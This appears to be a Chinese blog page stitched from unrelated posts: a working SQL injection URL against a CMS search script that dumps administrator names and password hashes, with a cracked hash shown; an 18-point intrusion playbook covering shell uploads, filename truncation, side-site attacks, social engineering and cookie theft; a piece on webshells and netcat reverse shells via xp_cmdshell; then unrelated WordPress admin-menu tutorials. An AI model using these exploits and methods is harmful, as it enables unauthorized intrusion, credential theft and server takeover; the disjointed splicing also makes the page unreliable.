那么直接用下面的exp
[code]xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\’`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\’`+]=a[/code]
admin
04d1823eacbfc41d78f9…
忘记了,这是20位数的
我们去掉前面一个,去掉后面三个
错了,是去掉前面三个,后面一个
1823eacbfc41d78f = lezhe888
1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!
2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件;
3.asp(aspx)+ACCESS拿shell一般只有3种方法,一是前台上传或者注入进后台上传;二是注入进后台改配置文件;三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句话;
4.php+MYSQL一般是注入进后台上传,偶尔运气好些权限够高可以注入select into outfile;然后包含,分本地与远程,远程包含在高版本php是不支持的,于是想办法本地上传图片文件或者写到log里;然后php程序某某未公开的漏洞,运气好可以直接写shell。
5.jsp+MYSQL利用数据库拿权限方面基本同php,而且jsp的上传基本很少检查文件后缀,于是只要有注入点与后台,拿shell相当的容易。jsp+ORACLE的站我碰到的不多,碰到的也是猜出用户名与密码从后台下手的。
6.无论什么大站,主站一般都很安全(不然早被人玩了),于是一般从二级域名下手,猜出主站的某些用户名与密码或者搞到主站的源代码,或者旁注得到同网段服务器后cain或arp。
7.一般的大站很少有用现成的CMS的,于是如果你有幸找到源码,那你就发了,注入漏洞啊,上传漏洞啊,写文件漏洞啊,都掌握在你手里。多看看那些大站新出来的测试分站点,那些站还在测试中,可以很轻松拿下。
8.上传有个文件名截断,这包括2个方面,一是00截断,二是长文件名截断(曾经利用这个搞下hw);然后很多写文件的地方,都可以00,屡试不爽。上传别忘了.asp(当然.asa,.cer,.cdx都可以啦)目录的妙用。
9.php站无论windows还是linux,都有magic_quotes_gpc的问题,magic_quotes_gpc为on的时候,在server变量注入的时候还是可以select into outfile,今年我搞过某未开源cms就是这个情况,一般情况下为on就别考虑写文件了,不过有这个权限别忘了读文件源码,因为load_file的参数是可以编码的。
10.猜路径或者文件在入侵中非常必要,猜不到路径的时候别忘了google(baidu太烂,google很全),于是你可以考虑看站点下的robot.txt或者robots.txt,会有惊喜。
11.工具的使用很重要,入侵之前用WVS扫扫会有助入侵;注入工具虽然很多,但不见得都好使,现在的软硬防火墙、防注入越来越厉害,那时候你就别偷懒,多手工有助你成长。
12.遇到过一流监控么,遇到其他防post的防火墙么,有时候一句话进去了都无法传大马,那时候,你先学学编码,学学变换绕过。
13.想搞一般的小站,记得查看这个小站的版权,找做这个站的公司,然后从这个公司做的其他站下手,得到源码再回头搞,我曾经通过这个方法拿下某知名制药的公司站。
14.旁注的思路永远不过时,遇到dbowner的注入,可以很舒服写shell到你需要的站,省得麻烦的提权了;运气不好,按部就班拿shell提权得到你所需。
15.永远别忘记社会工程学,利用社工把自己当成一个什么也不会的人,从某某站长的qq,身份证,邮箱等等下手,也许有时可能会有意外;另外别忘记admin,admin;test,test;123456,123456这种简单的尝试,当然,你也可以暴力破解。
16.别忽视XSS,别忽视cookie,XSS可以偷cookie,更有若干妙用,自己学会领悟;cookie可以伪造登陆,cookie可以注入,cookie注入可以绕绝大多数的防火墙。
17.平时搞站多多搜集路径啊,源码啊,工具啊,充实自己的“武器”库;最好把自己的入侵步骤记录下来,或者事后反思下,我一般都是记在txt里,另外要做到举一反三。
18.多学习,多看源码,多看公布出来的0day,脚本是入侵的前提,而不是工具。
web服务器是很容易受到攻击的,而且攻击方式呈现多样化,很多人都不知道web服务器的攻击方式到底是哪些,所以都不知道如何下手预防web服务器被攻击,因此今天本教程就整理了一些攻击方式,让大家了解一下。
1、SQL注入漏洞的入侵
这种是ASP+ACCESS的网站入侵方式,通过注入点列出数据库里面管理员的帐号和密码信息,然后猜解出网站的后台地址,然后用帐号和密码登录进去找到文件上传的地方,把ASP木马上传上去,获得一个网站的WEBSHELL。
2、ASP上传漏洞的利用
这种技术方式是利用一些网站的ASP上传功能来上传ASP木马的一种入侵方式,不少网站都限制了上传文件的类型,一般来说ASP为后缀的文件都不允许上传,但是这种限制是可以被黑客突破的,黑客可以采取COOKIE欺骗的方式来上传ASP木马,获得网站的WEBSHELL权限。
3、后台数据库备份方式获得WEBSHELL
这个主要是利用网站后台对ACCESS数据库进行数据库备份和恢复的功能,备份数据库路径等变量没有过滤导致可以把任何文件的后缀改成ASP,那么利用网站上传的功能上传一个文件名改成JPG或者GIF后缀的ASP木马,然后用这个恢复库备份和恢复的功能把这个木马恢复成ASP文件,从而达到能够获取网站WEBSHELL控制权限的目的。
4、 网站旁注入侵
这种技术是通过IP绑定域名查询的功能查出服务器上有多少网站,然后通过一些薄弱的网站实施入侵,拿到权限之后转而控制服务器的其它网站。
5、sa注入点利用的入侵技术
这种是ASP+MSSQL网站的入侵方式,找到有SA权限的SQL注入点,然后用SQL数据库的XP_CMDSHELL的存储扩展来运行系统命令建立系统级别的帐号,然后通过3389登录进去,或者在一台肉鸡上用NC开设一个监听端口,然后用VBS一句话木马下载一个NC到服务器里面,接着运行NC的反向连接命令,让服务器反向连接到远程肉鸡上,这样远程肉鸡就有了一个远程的系统管理员级别的控制权限。
今儿再分享一下在 wordpress 后台侧边栏添加子菜单的方法,用到的函数是:add_submenu_page()。
函数用法:
[code]add_submenu_page( $parent_slug, $page_title, $menu_title, $capability, $menu_slug, $function ); [/code]
下面说说各参数:
$parent_slug:(字符串) (必须)顶级菜单名称,可以在顶级菜单中加入我们的子菜单,也可以在自定义顶级菜单中加入子菜单;
几种情况:
1、在仪表盘添加子菜单: add_submenu_page(‘index.php’, … );
2、在文章处添加子菜单: add_submenu_page(‘edit.php’, … );
3、在媒体处添加子菜单: add_submenu_page(‘upload.php’, … );
4、在链接处添加子菜单: add_submenu_page(‘link-manager.php’, … );
5、在页面处添加子菜单: add_submenu_page(‘edit.php?post_type=page’, … );
6、在评论处添加子菜单: add_submenu_page(‘edit-comments.php’, … );
7、在你自定义文章类型处添加子菜单: add_submenu_page(‘edit.php?post_type=your_post_type’,…)
8、在外观处添加子菜单: add_submenu_page(‘themes.php’, … );
9、在插件处添加子菜单: add_submenu_page(‘plugins.php’, … );
10、在用户处添加子菜单: add_submenu_page(‘users.php’, … );
11、在工具处添加子菜单: add_submenu_page(‘tools.php’, … );
12、在设置处添加子菜单: add_submenu_page(‘options-general.php’, … );
$page_title:(字符串) (必须) 这个参数是子菜单的标题,将会显示在浏览器的标题栏,默认为空;
$menu_title:(字符串) (必须) 显示的菜单名称,默认为空;
$capability:(字符串) (必须) 用户权限,定义了具有哪些权限的用户会看到这个子菜单(权限部分请看文章结尾处),默认为空,参照capability;
$menu_slug:(字符串) (必须) 显示在URl上面的菜单名称,默认为空;
$function:所有调用的函数名称,通过调用这个函数来显示这个子菜单页面的内容。
俩例子,先上图:
1、在顶级菜单“工具(tools)”下添加子菜单
[code]<?php
add_action(‘admin_menu’, ‘register_my_custom_submenu_page’);
function register_my_custom_submenu_page() {
add_submenu_page( ‘tools.php’, ‘子菜单’, ‘子菜单名称’, ‘manage_options’, ‘my-custom-submenu-page’, ‘my_custom_submenu_page_callback’ );
}
function my_custom_submenu_page_callback() {
echo ‘<h3>子菜单的页面内容</h3>’;
}
?>[/code]
2、在自定义的顶级菜单中添加子菜单
[code]<?php
function add_diy_menu() {
add_menu_page(__(‘顶级菜单’),__(‘顶级菜单名称’),8,__FILE__,’my_function_menu’);
add_submenu_page(__FILE__,’子菜单1′,’子菜单名称1′,8,’your-admin-sub-menu1′,’my_function_submenu1′);
add_submenu_page(__FILE__,’子菜单2′,’子菜单名称2′,8,’your-admin-sub-menu2′,’my_function_submenu2′);
}
function my_function_menu() {
echo “<h2>顶级菜单的页面内容</h2>”;
}
function my_function_submenu1() {
echo “<h2>子菜单1的页面内容</h2>”;
}
function my_function_submenu2() {
echo “<h2>子菜单2的页面内容</h2>”;
}
add_action(‘admin_menu’,’add_diy_menu’);
?>[/code]
最后附上:各个用户角色所具有的权限,可以参看这个对应关系表:Capability vs. Role Table,横坐标是用户角色,纵坐标是用户权限,中间蓝色高亮部分为各个角色所拥有的权限。
在 wordpress 插件、主题等制作过程中,经常需要在后台添加菜单,今儿分享一下在 wordpress 后台侧边栏添加顶级菜单的方法,也算加深一下印象吧,用到的函数是:add_menu_page()。
函数用法:
[code]add_menu_page( $page_title, $menu_title, $capability, $menu_slug, $function, $icon_url, $position ); [/code]
下面说说各参数:
$page_title:(字符串) (必须) 这个参数是子菜单的标题,将会显示在浏览器的标题栏,默认为空;
$menu_title:(字符串) (必须) 显示的菜单名称,默认为空;
$capability:(字符串) (必须) 用户权限,定义了具有哪些权限的用户会看到这个子菜单(权限部分请看文章结尾处),默认为空,参照capability;
$menu_slug:(字符串) (必须) 显示在URl上面的菜单名称,默认为空;
$function:返回的方法名称;
$icon_url:(字符串) (可选) 显示的菜单图标,可以使用plugin_dir_url( __FILE__ ),图标宽高为16像素;
$position:(整数) (可选) 显示菜单的位置。常用位置,4或者59或者99。
示例:
[code]<?php
add_action(‘admin_menu’, ‘register_custom_menu_page’);
function register_custom_menu_page() {
add_menu_page(‘自定义菜单标题’, ‘测试菜单’, ‘administrator’, ‘myplugin/myplugin-index.php’,”,plugins_url(‘myplugin/images/icon.png’), 6);
}
//然后将下面的代码放到myplugin/myplugin-index.php文件中
echo “Admin Page Test”;
//或者使用下面方法
add_action(‘admin_menu’, ‘register_custom_menu_page’);
function register_custom_menu_page(){
add_menu_page(‘菜单标题’, ‘菜单名称’, ‘administrator’, ‘custompage’, ‘custom_menu_page’, plugins_url(‘myplugin/images/icon.png’), 6);
}
function custom_menu_page(){
echo “Admin Page Test”;
}[/code]
最后附上:各个用户角色所具有的权限,可以参看这个对应关系表:Capability vs. Role Table,横坐标是用户角色,纵坐标是用户权限,中间蓝色高亮部分为各个角色所拥有的权限。